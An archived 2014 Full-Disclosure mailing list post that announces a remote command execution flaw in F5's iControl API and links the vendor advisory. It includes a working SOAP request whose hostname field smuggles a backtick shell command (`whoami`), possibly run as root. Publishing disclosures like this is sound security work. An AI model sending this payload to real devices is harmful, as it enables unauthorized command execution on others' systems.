lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 07 May 2014 17:43:55 -0500
From: Brandon Perry <bperry.volatile@...il.com>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] Moar F5 fun in iControl API

Hi,

Linked below is an advisory regarding remote command execution (as root,
possibly) vulnerabilities within the iControl API:

http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15220.html


An example request that will set the hostname to 'root.example.com':

<?xml version="1.0" encoding="ISO-8859-1"?>
<SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
  <SOAP-ENV:Body>
    <n1:set_hostname xmlns:n1="urn:iControl:System/Inet">
      <hostname>`whoami`.example.com</hostname>
    </n1:set_hostname>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>


This was responsibly disclosed to F5 on the 7th of February. If you
would like the full communication timeline, feel free to ask.

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ